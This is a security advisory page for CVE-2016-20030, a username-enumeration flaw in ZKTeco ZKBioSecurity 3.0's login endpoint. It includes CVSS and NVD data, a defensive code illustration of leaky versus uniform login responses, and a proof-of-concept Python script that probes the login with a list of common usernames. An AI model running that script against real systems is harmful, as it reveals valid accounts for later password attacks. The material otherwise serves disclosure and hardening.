Security Vulnerability Report
CVE-2016-20030 CVSS 9.8 CRITICAL


Published: 2026-03-16 14:17:50
Last Modified: 2026-04-15 14:56:46

Description

ZKTeco ZKBioSecurity 3.0 contains a user enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by submitting partial characters via the username parameter. Attackers can send requests to the authLoginAction!login.do script with varying username inputs to enumerate valid user accounts based on application responses.
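The response differential that turns a login page into a username oracle, shown as an added illustration beside the uniform-response form that removes it. This is not ZKBioSecurity's code: the in-memory user store, the error strings and the PBKDF2 hashing are assumed for the demonstration.

```python
import hashlib
import hmac
import os


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed in-memory user store for the illustration (not the product's storage).
_SALT = os.urandom(16)
USERS = {"admin": _hash("correct horse battery staple", _SALT)}
# Dummy hash used for unknown usernames so both branches do the same amount of work.
_DUMMY = _hash("placeholder", _SALT)


def login_leaky(username: str, password: str) -> tuple[int, str]:
    """The bug class in the advisory: the error text says whether the username
    exists, so an unauthenticated client can confirm accounts one request at a time."""
    stored = USERS.get(username)
    if stored is None:
        return 200, "user not found"
    if not hmac.compare_digest(stored, _hash(password, _SALT)):
        return 200, "wrong password"
    return 302, "ok"


def login_uniform(username: str, password: str) -> tuple[int, str]:
    """Hardened form: same status and message for an unknown user and a wrong
    password, and the password hash is always computed so timing does not leak either."""
    stored = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(stored, _hash(password, _SALT)) and username in USERS
    if not ok:
        return 200, "invalid username or password"
    return 302, "ok"


def responses_distinguish_users(handler) -> bool:
    """Defender self-check for a login handler: with a wrong password, does a
    known username get a different answer than an unknown one?"""
    known = handler("admin", "not-the-password")
    unknown = handler("nobody", "not-the-password")
    return known != unknown
```

Running responses_distinguish_users against a real login form (status, body and response time compared) is the same check a security review would make before closing a ticket like this one.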

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available in the record. Affected product, per the description: ZKTeco ZKBioSecurity 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2016-20030 - ZKTeco ZKBioSecurity User Enumeration PoC
# Target: ZKTeco ZKBioSecurity 3.0
# Vulnerability: Unauthenticated user enumeration via authLoginAction!login.do

TARGET_URL = "http://target.com/authLoginAction!login.do"
USERNAME_LIST = ["admin", "root", "user", "test", "administrator", "manager"]


def enumerate_users():
    """Enumerate valid usernames from ZKBioSecurity login interface"""
    print(f"[*] Starting user enumeration on {TARGET_URL}")
    valid_users = []
    for username in USERNAME_LIST:
        payload = {
            "username": username,
            "password": "invalid_password_for_testing",
        }
        try:
            response = requests.post(TARGET_URL, data=payload, timeout=10)
            # Analyze response to determine if username is valid
            # Valid users typically return different error messages
            if "user not found" not in response.text.lower() and response.status_code == 200:
                print(f"[+] Potential valid user found: {username}")
                valid_users.append(username)
            else:
                print(f"[-] User not valid: {username}")
        except requests.RequestException as e:
            print(f"[!] Error testing {username}: {e}")
    print(f"\n[*] Enumeration complete. Found {len(valid_users)} potential users")
    return valid_users


if __name__ == "__main__":
    enumerate_users()

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/116485
https://packetstormsecurity.com/files/138573
https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-user-enumeration-via-authloginaction
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20030", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:49.727", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKBioSecurity 3.0 contains a user enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by submitting partial characters via the username parameter. Attackers can send requests to the authLoginAction!login.do script with varying username inputs to enumerate valid user accounts based on application responses."}, {"lang": "es", "value": "ZKTeco ZKBioSecurity 3.0 contiene una vulnerabilidad de enumeración de usuarios que permite a atacantes no autenticados descubrir nombres de usuario válidos al enviar caracteres parciales a través del parámetro username. Los atacantes pueden enviar solicitudes al script authLoginAction!login.do con diferentes entradas de nombre de usuario para enumerar cuentas de usuario válidas basándose en las respuestas de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-551"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116485", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138573", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-user-enumeration-via-authloginaction", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php", "source": "[email protected]"}]}}